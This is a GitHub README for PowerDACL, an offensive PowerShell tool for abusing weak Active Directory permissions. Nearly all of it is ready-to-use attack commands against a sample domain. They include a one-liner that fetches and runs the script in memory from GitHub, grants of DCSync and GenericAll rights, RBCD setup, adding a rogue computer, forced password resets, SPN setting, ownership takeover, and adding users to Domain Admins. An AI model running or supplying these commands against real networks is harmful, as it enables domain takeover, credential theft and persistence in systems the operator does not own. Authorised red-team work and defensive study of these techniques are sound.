Leo4j/PowerDACL

GitHub: Leo4j/PowerDACL

A PowerShell tool for abusing weak Active Directory DACL and ACE permissions to achieve privilege escalation and lateral movement.

Stars: 61 | Forks: 8

# PowerDACL

A tool to abuse weak permissions on Active Directory Discretionary Access Control Lists (DACLs) and Access Control Entries (ACEs).

## Load PowerDACL in memory

```
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/PowerDACL/main/PowerDACL.ps1')
```

## Help page

```
PowerDACL
```

## Grant DCSync rights

```
DCSync -Target username -TargetDomain ferrari.local -TargetServer dc01.ferrari.local
```

## Grant GenericAll rights

```
GenericAll -Target MSSQL01$ -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -Grantee username
```

```
GenericAll -Target MSSQL01$ -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -Grantee username -GranteeDomain domain.local -GranteeServer dc02.domain.local
```

## Set RBCD

```
RBCD -Target MSSQL01$ -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -Grantee username
```

```
RBCD -Target MSSQL01$ -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -Grantee username -GranteeDomain domain.local -GranteeServer dc02.domain.local
```

```
RBCD -Clear -Target MSSQL01$ -TargetDomain ferrari.local -TargetServer dc01.ferrari.local
```

## Add a computer to the domain

```
AddComputer -ComputerName evilcomputer -Password P@ssw0rd! -Domain ferrari.local -Server dc01.ferrari.local
```

```
AddComputer -ComputerName evilcomputer -Domain ferrari.local -Server dc01.ferrari.local
```

## Delete a computer from the domain

```
DeleteComputer -ComputerName evilcomputer -Domain ferrari.local -Server dc01.ferrari.local
```

## Force a password change

```
ForceChangePass -Target username -Password P@ssw0rd! -TargetDomain ferrari.local -TargetServer dc01.ferrari.local
```

## Set an SPN

```
SetSPN -Target username -TargetDomain ferrari.local -TargetServer dc01.ferrari.local
```

```
SetSPN -Target username -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -SPN "test/test"
```

## Remove an SPN

```
RemoveSPN -Target username -TargetDomain ferrari.local -TargetServer dc01.ferrari.local
```

## Set the owner

```
SetOwner -Target MSSQL01$ -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -Owner username
```

```
SetOwner -Target MSSQL01$ -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -Owner username -OwnerDomain domain.local -OwnerServer dc02.domain.local
```

## Enable an account

```
EnableAccount -Target myComputer$ -Domain ferrari.local -Server dc01.ferrari.local
```

## Disable an account

```
DisableAccount -Target myComputer$ -Domain ferrari.local -Server dc01.ferrari.local
```

## Add an object to a group

```
AddToGroup -Target user -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -Group "Domain Admins"
```

```
AddToGroup -Target user -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -Group "Domain Admins" -GroupDomain domain.local -GroupServer dc02.domain.local
```

## Remove an object from a group

```
RemoveFromGroup -Target user -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -Group "Domain Admins"
```

```
RemoveFromGroup -Target user -TargetDomain ferrari.local -TargetServer dc01.ferrari.local -Group "Domain Admins" -GroupDomain domain.local -GroupServer dc02.domain.local
```

## Modify or clear an object's attributes

```
Set-DomainObject -Identity user -Set @{'userprincipalname' = "user@domain.com"}
```

```
Set-DomainObject -Identity user -Clear 'userprincipalname'
```

## Shadow Credentials

https://github.com/Leo4j/KeyCredentialLink